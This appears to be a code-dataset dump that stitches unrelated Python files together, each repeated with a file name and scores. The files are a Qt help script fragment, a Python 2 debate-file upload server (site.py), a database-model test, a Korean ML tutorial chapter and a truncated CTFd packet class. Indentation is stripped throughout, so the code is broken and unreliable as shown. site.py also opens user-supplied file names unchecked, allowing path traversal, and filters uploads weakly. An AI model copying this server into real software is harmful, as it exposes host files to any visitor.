def q_print(*p_args, **p_kwargs):
if not quiet:
print(*p_args, **p_kwargs)
options = Options(
cache_path=BasePath(args.cache_dir),
qhp=os.path.basename(args.output),
force=args.force,
sources=args.levels,
qhp_namespace=args.namespace,
quiet=args.quiet,
print=q_print,
)
do_levels(options)
if __name__ == "__main__":
main() | 0.589953 | 0.149128 |
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import shutil
def savefile(fname, messagecontent):
os.chdir('files\\subs')
with open(fname, 'wb') as ufl:
ufl.write(messagecontent)
ufl.close()
os.chdir('..\\..')
print "File saved!"
def escape(input):
js_replacements = {'&': '&', '<': '<', '>': '>', '"': '"',
"'": ''', '/': '/', '`': '`', '=': '='}
sanit = ''
for char in input:
if char in ['&', '<', '>', '"', "'", '/', '`', '=']:
char = js_replacements[char]
sanit += char
return sanit
def downloads_ls():
os.chdir('files\\repo')
lsa = os.listdir(os.getcwd())
os.chdir('..\\..')
return lsa
def fetch(toFetch):
global fetchpath
fetchpath = str(toFetch)
class WebServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path.endswith("/upload"):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><title>Submit a new file</title>"
output += "<body>"
output += "<h2> How's it going?</h2>"
output += '''<form method = 'POST' enctype='multipart/form-data' action='/upload'> What file would you like to upload? </h2>
<br><input name = 'filename' type = 'text' maxlength="40"><br> <input name = 'userfile' type = 'file'><br> <input type = 'submit' value = 'Upload'></form>'''
output += "</body></html>"
self.wfile.write(output.encode(encoding='utf_8'))
return
elif self.path.endswith("/download"):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
ready = downloads_ls()
print ready
output = ""
output += "<html><title>Download an existing file</title>"
output += "<body>"
output += "<h2> Choose a file:</h2>"
for file in ready:
output += "<p>" + str(file) + "</p>"
output += "<form method = 'POST' enctype='multipart/form-data' action='/download'> What file would you like to download? </h2><input name = 'filename' type = 'text'> <input type = 'submit' value = 'Download'></form>"
output += "</body></html>"
self.wfile.write(output.encode(encoding='utf_8'))
return
elif self.path.endswith("/file-get"):
os.chdir('files\\repo')
with open(fetchpath, 'rb') as f:
self.send_response(200)
self.send_header("Content-Type", 'application/octet-stream')
self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(fetchpath)))
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs.st_size))
self.end_headers()
shutil.copyfileobj(f, self.wfile)
f.close()
print "Download Successful"
os.chdir('..\\..')
return
else:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><title>Files for debate</title><body>"
output += "<p>Welcome to this convenient site I made to upload debate files to!</p>"
output += "<a href=upload>" + 'Submit a file to be uploaded' + "</a>"
output += "<p><a href=download>" + 'Access files others have submitted' + "</a></p><br>"
output += "Number of visitors: <br>"
output += '''<a href="http://counter5nolixj34.onion/visits.php?id=a17336fc5c02f2444f699f53e6acc3cf"><img style="height:24px;width:auto;" src="http://counter5nolixj34.onion/counter.gif?id=a17336fc5c02f2444f699f53e6acc3cf&bg=000000&fg=FFFFFF&tr=0&unique=0&mode=0"></a>'''
output += "</body></html>"
self.wfile.write(output.encode(encoding='utf_8'))
print "Home"
return
def do_POST(self):
try:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
ctype, pdict = cgi.parse_header(
self.headers.getheader('content-type'))
if (ctype == 'multipart/form-data') and (self.path.endswith('/upload')):
filework = True
fields = cgi.parse_multipart(self.rfile, pdict)
fname = fields.get('filename')
print fname
messagecontent = fields.get('userfile')
if ('.inf' not in fname[0]) and ('.exe' not in fname[0]):
savefile(fname[0], messagecontent[0])
elif (ctype == 'multipart/form-data') and (self.path.endswith('/download')):
filework = True
fields = cgi.parse_multipart(self.rfile, pdict)
fname = fields.get('filename')
print fname
fetch(fname[0])
output = ""
output += "<html><head>"
output += '<meta http-equiv="refresh" content="0; url=/file-get" />'
output += "</head><body>"
output += "</body></html>"
self.wfile.write(output.encode(encoding="utf_8"))
if (filework):
print "File + return"
output = ""
output += "<html>"
output += "<body><a href='/'> Home </a></p>"
output += "</body></html>"
self.wfile.write(output.encode(encoding="utf_8"))
except:
pass
def main():
try:
port = 8000
server = HTTPServer(('', port), WebServerHandler)
print "Web Server running on port: 8000"
server.serve_forever()
except KeyboardInterrupt:
print " ^C entered, stopping web server...."
server.socket.close()
if __name__ == '__main__':
main() | site.py | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import shutil
def savefile(fname, messagecontent):
os.chdir('files\\subs')
with open(fname, 'wb') as ufl:
ufl.write(messagecontent)
ufl.close()
os.chdir('..\\..')
print "File saved!"
def escape(input):
js_replacements = {'&': '&', '<': '<', '>': '>', '"': '"',
"'": ''', '/': '/', '`': '`', '=': '='}
sanit = ''
for char in input:
if char in ['&', '<', '>', '"', "'", '/', '`', '=']:
char = js_replacements[char]
sanit += char
return sanit
def downloads_ls():
os.chdir('files\\repo')
lsa = os.listdir(os.getcwd())
os.chdir('..\\..')
return lsa
def fetch(toFetch):
global fetchpath
fetchpath = str(toFetch)
class WebServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path.endswith("/upload"):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><title>Submit a new file</title>"
output += "<body>"
output += "<h2> How's it going?</h2>"
output += '''<form method = 'POST' enctype='multipart/form-data' action='/upload'> What file would you like to upload? </h2>
<br><input name = 'filename' type = 'text' maxlength="40"><br> <input name = 'userfile' type = 'file'><br> <input type = 'submit' value = 'Upload'></form>'''
output += "</body></html>"
self.wfile.write(output.encode(encoding='utf_8'))
return
elif self.path.endswith("/download"):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
ready = downloads_ls()
print ready
output = ""
output += "<html><title>Download an existing file</title>"
output += "<body>"
output += "<h2> Choose a file:</h2>"
for file in ready:
output += "<p>" + str(file) + "</p>"
output += "<form method = 'POST' enctype='multipart/form-data' action='/download'> What file would you like to download? </h2><input name = 'filename' type = 'text'> <input type = 'submit' value = 'Download'></form>"
output += "</body></html>"
self.wfile.write(output.encode(encoding='utf_8'))
return
elif self.path.endswith("/file-get"):
os.chdir('files\\repo')
with open(fetchpath, 'rb') as f:
self.send_response(200)
self.send_header("Content-Type", 'application/octet-stream')
self.send_header("Content-Disposition", 'attachment; filename="{}"'.format(os.path.basename(fetchpath)))
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs.st_size))
self.end_headers()
shutil.copyfileobj(f, self.wfile)
f.close()
print "Download Successful"
os.chdir('..\\..')
return
else:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><title>Files for debate</title><body>"
output += "<p>Welcome to this convenient site I made to upload debate files to!</p>"
output += "<a href=upload>" + 'Submit a file to be uploaded' + "</a>"
output += "<p><a href=download>" + 'Access files others have submitted' + "</a></p><br>"
output += "Number of visitors: <br>"
output += '''<a href="http://counter5nolixj34.onion/visits.php?id=a17336fc5c02f2444f699f53e6acc3cf"><img style="height:24px;width:auto;" src="http://counter5nolixj34.onion/counter.gif?id=a17336fc5c02f2444f699f53e6acc3cf&bg=000000&fg=FFFFFF&tr=0&unique=0&mode=0"></a>'''
output += "</body></html>"
self.wfile.write(output.encode(encoding='utf_8'))
print "Home"
return
def do_POST(self):
try:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
ctype, pdict = cgi.parse_header(
self.headers.getheader('content-type'))
if (ctype == 'multipart/form-data') and (self.path.endswith('/upload')):
filework = True
fields = cgi.parse_multipart(self.rfile, pdict)
fname = fields.get('filename')
print fname
messagecontent = fields.get('userfile')
if ('.inf' not in fname[0]) and ('.exe' not in fname[0]):
savefile(fname[0], messagecontent[0])
elif (ctype == 'multipart/form-data') and (self.path.endswith('/download')):
filework = True
fields = cgi.parse_multipart(self.rfile, pdict)
fname = fields.get('filename')
print fname
fetch(fname[0])
output = ""
output += "<html><head>"
output += '<meta http-equiv="refresh" content="0; url=/file-get" />'
output += "</head><body>"
output += "</body></html>"
self.wfile.write(output.encode(encoding="utf_8"))
if (filework):
print "File + return"
output = ""
output += "<html>"
output += "<body><a href='/'> Home </a></p>"
output += "</body></html>"
self.wfile.write(output.encode(encoding="utf_8"))
except:
pass
def main():
try:
port = 8000
server = HTTPServer(('', port), WebServerHandler)
print "Web Server running on port: 8000"
server.serve_forever()
except KeyboardInterrupt:
print " ^C entered, stopping web server...."
server.socket.close()
if __name__ == '__main__':
main() | 0.16654 | 0.048114 |
import os
from datetime import date
from typing import Dict, Type, Optional, List
from unittest import TestCase, main
import sqlalchemy as orm
from sqlalchemy.ext.declarative import declarative_base
from dotenv import load_dotenv
from judah.destinations.database.connection import DatabaseConnection
from judah.destinations.database.config import DatabaseConnectionConfig
from judah.destinations.database.model import DatabaseBaseModel
from test.utils import create_tables_in_database, delete_tables_from_database, drop_schema
_ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
load_dotenv(os.path.join(_ROOT_PATH, '.env'))
_TEST_DB_URI = os.environ.get('TEST_POSTGRES_DB_URI')
_TEST_DB_BASE = declarative_base()
_TABLE_NAME = 'dummy'
_SCHEMA_NAME = 'test_schema'
class TestModel(DatabaseBaseModel, _TEST_DB_BASE):
"""Test database model"""
__tablename__ = _TABLE_NAME
__table_args__: Dict = {'schema': _SCHEMA_NAME}
_db_configuration: DatabaseConnectionConfig = DatabaseConnectionConfig(db_uri=_TEST_DB_URI)
_base_declarative_class: Type[declarative_base()] = _TEST_DB_BASE
_datetime_fields: Optional[List[str]] = ["Date"]
Date = orm.Column(orm.Date, primary_key=True)
number = orm.Column(orm.Integer, primary_key=True)
Capacity = orm.Column(orm.Integer)
Price = orm.Column(orm.Integer)
class TestDatabaseBaseModel(TestCase):
"""Tests for the DatabaseBaseModel base class"""
def setUp(self) -> None:
"""Initialize a few variables"""
self.data = [
{"Date": date(year=2020, month=3, day=9), "number": 1, "Capacity": 16616, "Price": 67},
{"Date": date(year=2020, month=3, day=12), "number": 2, "Capacity": 16516, "Price": 567},
{"Date": date(year=2020, month=3, day=10), "number": 3, "Capacity": 16616, "Price": 637},
{"Date": date(year=2020, month=3, day=9), "number": 4, "Capacity": 16620, "Price": 617},
]
try:
delete_tables_from_database(db_configuration=TestModel._db_configuration,
table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
except Exception:
pass
def load_database(self):
"""Loads the database with the self.data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
for datum in self.data:
record = TestModel(**datum)
db_connection.db_session.add(record)
db_connection.db_session.commit()
def test_get_attributes(self):
"""Should return the column names of the model"""
self.load_database()
column_names = TestModel.get_attributes()
expected_columns = ['Date', 'number', 'Capacity', 'Price', 'created_at', 'updated_at']
self.assertListEqual(sorted(column_names), sorted(expected_columns))
def test_get_last_record(self):
"""Should return the latest record according to the given datetime column"""
self.load_database()
last_record = TestModel.get_last_record()
expected_last_record = self.data[1]
columns = ['Date', 'number', 'Capacity', 'Price']
for column in columns:
self.assertEqual(getattr(last_record, column), expected_last_record[column])
def test_get_last_saved_timestamp(self):
"""Should return the timestamp of the last saved record"""
self.load_database()
last_timestamp = TestModel.get_last_saved_timestamp()
expected_last_timestamp = self.data[1]['Date']
self.assertEqual(last_timestamp, expected_last_timestamp)
def test_update(self):
"""Should update the attributes passed in the kwargs and saves"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
db_connection.db_session.add(record)
db_connection.db_session.commit()
new_capacity = 56
new_price = 7
record.update(session=db_connection.db_session, Capacity=new_capacity, Price=new_price)
record_from_database = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
self.assertEqual(record_from_database.Capacity, new_capacity)
self.assertEqual(record_from_database.Price, new_price)
def test_save(self):
"""Should commit any new changes to the database"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
record_from_database_pre_save = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
record.save(db_connection.db_session)
record_from_database_post_save = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
self.assertIsNone(record_from_database_pre_save)
self.assertIsInstance(record_from_database_post_save, TestModel)
def test_delete(self):
"""Should delete the current record from the database"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
db_connection.db_session.add(record)
db_connection.db_session.commit()
record_from_database_pre_deletion = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
record.delete(db_connection.db_session)
record_from_database_post_deletion = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
self.assertIsNone(record_from_database_post_deletion)
self.assertIsInstance(record_from_database_pre_deletion, TestModel)
def test_create_schema(self):
"""Should create the schema for this class if it exists"""
drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
schema_check_sql = f"""
SELECT exists(select schema_name FROM information_schema.schemata WHERE schema_name = '{_SCHEMA_NAME}')
"""
self.assertFalse(db_connection.execute_sql(schema_check_sql).first()[0])
TestModel.create_schema(db_connection.connection_engine)
self.assertTrue(db_connection.execute_sql(schema_check_sql).first()[0])
def test_initialize(self):
"""Should create the tables in the database"""
drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
table_check_sql = f"""
SELECT EXISTS (
SELECT FROM pg_tables
WHERE schemaname = '{_SCHEMA_NAME}'
AND tablename = '{_TABLE_NAME}'
)
"""
self.assertFalse(db_connection.execute_sql(table_check_sql).first()[0])
TestModel.initialize()
self.assertTrue(db_connection.execute_sql(table_check_sql).first()[0])
def test_upsert_new_record(self):
"""upsert should creates a new record if it does not exist and then return the data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
raw_data = self.data[1]
record_from_database_pre_insert = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
db_connection.db_session.commit()
self.assertIsNone(record_from_database_pre_insert)
recorded_data = TestModel.upsert(raw_data)
record_from_database_post_insert = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
db_connection.db_session.commit()
self.assertDictEqual(recorded_data, raw_data)
self.assertIsInstance(record_from_database_post_insert, TestModel)
for field, value in raw_data.items():
self.assertEqual(getattr(record_from_database_post_insert, field), value)
def test_upsert_old_record(self):
"""upsert should update an existing record if it does not exist and then return the data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
raw_data = self.data[1]
record = TestModel(**raw_data)
db_connection.db_session.add(record)
db_connection.db_session.commit()
new_data = {
**raw_data,
'Capacity': 7643,
'Price': 211
}
updated_data = TestModel.upsert(new_data)
record_from_database_post_update = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
self.assertDictEqual(updated_data, new_data)
self.assertIsInstance(record_from_database_post_update, TestModel)
for field, value in new_data.items():
self.assertEqual(getattr(record_from_database_post_update, field), value)
def tearDown(self) -> None:
try:
delete_tables_from_database(db_configuration=TestModel._db_configuration,
table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
except Exception:
pass
DatabaseConnection.close_all_connections()
DatabaseConnection.remove_all_connections()
if __name__ == '__main__':
main() | test/test_destinations/test_database/test_model.py | import os
from datetime import date
from typing import Dict, Type, Optional, List
from unittest import TestCase, main
import sqlalchemy as orm
from sqlalchemy.ext.declarative import declarative_base
from dotenv import load_dotenv
from judah.destinations.database.connection import DatabaseConnection
from judah.destinations.database.config import DatabaseConnectionConfig
from judah.destinations.database.model import DatabaseBaseModel
from test.utils import create_tables_in_database, delete_tables_from_database, drop_schema
_ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__))))
load_dotenv(os.path.join(_ROOT_PATH, '.env'))
_TEST_DB_URI = os.environ.get('TEST_POSTGRES_DB_URI')
_TEST_DB_BASE = declarative_base()
_TABLE_NAME = 'dummy'
_SCHEMA_NAME = 'test_schema'
class TestModel(DatabaseBaseModel, _TEST_DB_BASE):
"""Test database model"""
__tablename__ = _TABLE_NAME
__table_args__: Dict = {'schema': _SCHEMA_NAME}
_db_configuration: DatabaseConnectionConfig = DatabaseConnectionConfig(db_uri=_TEST_DB_URI)
_base_declarative_class: Type[declarative_base()] = _TEST_DB_BASE
_datetime_fields: Optional[List[str]] = ["Date"]
Date = orm.Column(orm.Date, primary_key=True)
number = orm.Column(orm.Integer, primary_key=True)
Capacity = orm.Column(orm.Integer)
Price = orm.Column(orm.Integer)
class TestDatabaseBaseModel(TestCase):
"""Tests for the DatabaseBaseModel base class"""
def setUp(self) -> None:
"""Initialize a few variables"""
self.data = [
{"Date": date(year=2020, month=3, day=9), "number": 1, "Capacity": 16616, "Price": 67},
{"Date": date(year=2020, month=3, day=12), "number": 2, "Capacity": 16516, "Price": 567},
{"Date": date(year=2020, month=3, day=10), "number": 3, "Capacity": 16616, "Price": 637},
{"Date": date(year=2020, month=3, day=9), "number": 4, "Capacity": 16620, "Price": 617},
]
try:
delete_tables_from_database(db_configuration=TestModel._db_configuration,
table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
except Exception:
pass
def load_database(self):
"""Loads the database with the self.data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
for datum in self.data:
record = TestModel(**datum)
db_connection.db_session.add(record)
db_connection.db_session.commit()
def test_get_attributes(self):
"""Should return the column names of the model"""
self.load_database()
column_names = TestModel.get_attributes()
expected_columns = ['Date', 'number', 'Capacity', 'Price', 'created_at', 'updated_at']
self.assertListEqual(sorted(column_names), sorted(expected_columns))
def test_get_last_record(self):
"""Should return the latest record according to the given datetime column"""
self.load_database()
last_record = TestModel.get_last_record()
expected_last_record = self.data[1]
columns = ['Date', 'number', 'Capacity', 'Price']
for column in columns:
self.assertEqual(getattr(last_record, column), expected_last_record[column])
def test_get_last_saved_timestamp(self):
"""Should return the timestamp of the last saved record"""
self.load_database()
last_timestamp = TestModel.get_last_saved_timestamp()
expected_last_timestamp = self.data[1]['Date']
self.assertEqual(last_timestamp, expected_last_timestamp)
def test_update(self):
"""Should update the attributes passed in the kwargs and saves"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
db_connection.db_session.add(record)
db_connection.db_session.commit()
new_capacity = 56
new_price = 7
record.update(session=db_connection.db_session, Capacity=new_capacity, Price=new_price)
record_from_database = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
self.assertEqual(record_from_database.Capacity, new_capacity)
self.assertEqual(record_from_database.Price, new_price)
def test_save(self):
"""Should commit any new changes to the database"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
record_from_database_pre_save = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
record.save(db_connection.db_session)
record_from_database_post_save = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
db_connection.db_session.commit()
self.assertIsNone(record_from_database_pre_save)
self.assertIsInstance(record_from_database_post_save, TestModel)
def test_delete(self):
"""Should delete the current record from the database"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
record = TestModel(**self.data[1])
db_connection.db_session.add(record)
db_connection.db_session.commit()
record_from_database_pre_deletion = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
record.delete(db_connection.db_session)
record_from_database_post_deletion = db_connection.db_session.query(TestModel).filter_by(
Date=record.Date, number=record.number).first()
self.assertIsNone(record_from_database_post_deletion)
self.assertIsInstance(record_from_database_pre_deletion, TestModel)
def test_create_schema(self):
"""Should create the schema for this class if it exists"""
drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
schema_check_sql = f"""
SELECT exists(select schema_name FROM information_schema.schemata WHERE schema_name = '{_SCHEMA_NAME}')
"""
self.assertFalse(db_connection.execute_sql(schema_check_sql).first()[0])
TestModel.create_schema(db_connection.connection_engine)
self.assertTrue(db_connection.execute_sql(schema_check_sql).first()[0])
def test_initialize(self):
"""Should create the tables in the database"""
drop_schema(db_configuration=TestModel._db_configuration, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
table_check_sql = f"""
SELECT EXISTS (
SELECT FROM pg_tables
WHERE schemaname = '{_SCHEMA_NAME}'
AND tablename = '{_TABLE_NAME}'
)
"""
self.assertFalse(db_connection.execute_sql(table_check_sql).first()[0])
TestModel.initialize()
self.assertTrue(db_connection.execute_sql(table_check_sql).first()[0])
def test_upsert_new_record(self):
"""upsert should creates a new record if it does not exist and then return the data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
raw_data = self.data[1]
record_from_database_pre_insert = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
db_connection.db_session.commit()
self.assertIsNone(record_from_database_pre_insert)
recorded_data = TestModel.upsert(raw_data)
record_from_database_post_insert = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
db_connection.db_session.commit()
self.assertDictEqual(recorded_data, raw_data)
self.assertIsInstance(record_from_database_post_insert, TestModel)
for field, value in raw_data.items():
self.assertEqual(getattr(record_from_database_post_insert, field), value)
def test_upsert_old_record(self):
"""upsert should update an existing record if it does not exist and then return the data"""
create_tables_in_database(db_configuration=TestModel._db_configuration,
model_base=_TEST_DB_BASE, schema_name=_SCHEMA_NAME)
with DatabaseConnection.get_db_connection(
db_connection_config=TestModel._db_configuration) as db_connection:
raw_data = self.data[1]
record = TestModel(**raw_data)
db_connection.db_session.add(record)
db_connection.db_session.commit()
new_data = {
**raw_data,
'Capacity': 7643,
'Price': 211
}
updated_data = TestModel.upsert(new_data)
record_from_database_post_update = db_connection.db_session.query(TestModel).filter_by(
Date=raw_data['Date'], number=raw_data['number']).first()
self.assertDictEqual(updated_data, new_data)
self.assertIsInstance(record_from_database_post_update, TestModel)
for field, value in new_data.items():
self.assertEqual(getattr(record_from_database_post_update, field), value)
def tearDown(self) -> None:
try:
delete_tables_from_database(db_configuration=TestModel._db_configuration,
table_name=_TABLE_NAME, schema_name=_SCHEMA_NAME)
except Exception:
pass
DatabaseConnection.close_all_connections()
DatabaseConnection.remove_all_connections()
if __name__ == '__main__':
main() | 0.71113 | 0.243389 |
import os
os.getcwd()
#%%
os.chdir("C:\\Users\\LEEMK\\Downloads\\handson-ml-master")
#%%
# 파이썬 2와 파이썬 3 지원
from __future__ import division, print_function, unicode_literals
# 공통
import numpy as np
import os
# 일관된 출력을 위해 유사난수 초기화
np.random.seed(42)
# 맷플롯립 설정
%matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
# 한글출력
matplotlib.rc('font', family='NanumBarunGothic')
plt.rcParams['axes.unicode_minus'] = False
# 그림을 저장할 폴드
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "end_to_end_project"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
#%%
import os
import tarfile
from six.moves import urllib
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
#%%
fetch_housing_data()
#%%
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
#%%
housing = load_housing_data()
housing.head()
#%%
housing.info()
#%%
housing["ocean_proximity"].value_counts()
#%%
housing.describe()
#%%
%matplotlib inline
import matplotlib.pyplot as plt
housing.hist(bins=50, figsize=(20,15))
save_fig("attribute_histogram_plots")
plt.show()
#%%
#%%
#%%
#%%
#%%
#%%
#%%
#%% | Chapter02.py | import os
os.getcwd()
#%%
os.chdir("C:\\Users\\LEEMK\\Downloads\\handson-ml-master")
#%%
# 파이썬 2와 파이썬 3 지원
from __future__ import division, print_function, unicode_literals
# 공통
import numpy as np
import os
# 일관된 출력을 위해 유사난수 초기화
np.random.seed(42)
# 맷플롯립 설정
%matplotlib inline
import matplotlib
import matplotlib.pyplot as plt
plt.rcParams['axes.labelsize'] = 14
plt.rcParams['xtick.labelsize'] = 12
plt.rcParams['ytick.labelsize'] = 12
# 한글출력
matplotlib.rc('font', family='NanumBarunGothic')
plt.rcParams['axes.unicode_minus'] = False
# 그림을 저장할 폴드
PROJECT_ROOT_DIR = "."
CHAPTER_ID = "end_to_end_project"
IMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, "images", CHAPTER_ID)
def save_fig(fig_id, tight_layout=True, fig_extension="png", resolution=300):
path = os.path.join(IMAGES_PATH, fig_id + "." + fig_extension)
if tight_layout:
plt.tight_layout()
plt.savefig(path, format=fig_extension, dpi=resolution)
#%%
import os
import tarfile
from six.moves import urllib
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
#%%
fetch_housing_data()
#%%
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
#%%
housing = load_housing_data()
housing.head()
#%%
housing.info()
#%%
housing["ocean_proximity"].value_counts()
#%%
housing.describe()
#%%
%matplotlib inline
import matplotlib.pyplot as plt
housing.hist(bins=50, figsize=(20,15))
save_fig("attribute_histogram_plots")
plt.show()
#%%
#%%
#%%
#%%
#%%
#%%
#%%
#%% | 0.121908 | 0.282073 |
from flask_sqlalchemy import SQLAlchemy
from CTFd import models
from socket import inet_aton, inet_ntoa
from struct import unpack, pack
from struct import *
from time import ctime,sleep
from os import system
from CTFd.models import *
import socket
import struct
import ctypes
import datetime
import thread, time
import Transport
from generalfunction import GenerateSN,GeneratePacketHeader,Confirm
#1.2.40
class BackupConfigFile():
def __init__(self, id,dest_host,parameters,target ):
self.id = id
self.dest_host = dest_host
self.target = target
self.sn = GenerateSN()
# data of packet
self.FunCode = 254
self.Param1 = 254
self.Param2 = 6
self.Command_Code = 78
self.File_Type = parameters[0]#int
self.Offset = parameters[1] #string
self.flag = 128
self.filepath = parameters[2]
def PackContent(self):
buf = ctypes.create_string_buffer(16) ###change the size
struct.pack_into('!BBHBB', buf, 0, self.FunCode, self.Param1, self.Param2, self.Command_Code, self.File_Type)
struct.pack_into('L', buf, 6, self.Offset)
struct.pack_into('!B', buf, 10, self.flag)
return buf.raw
def PackPacket(self):
#sn = GenerateSN()
snh = struct.pack("!L", self.sn)
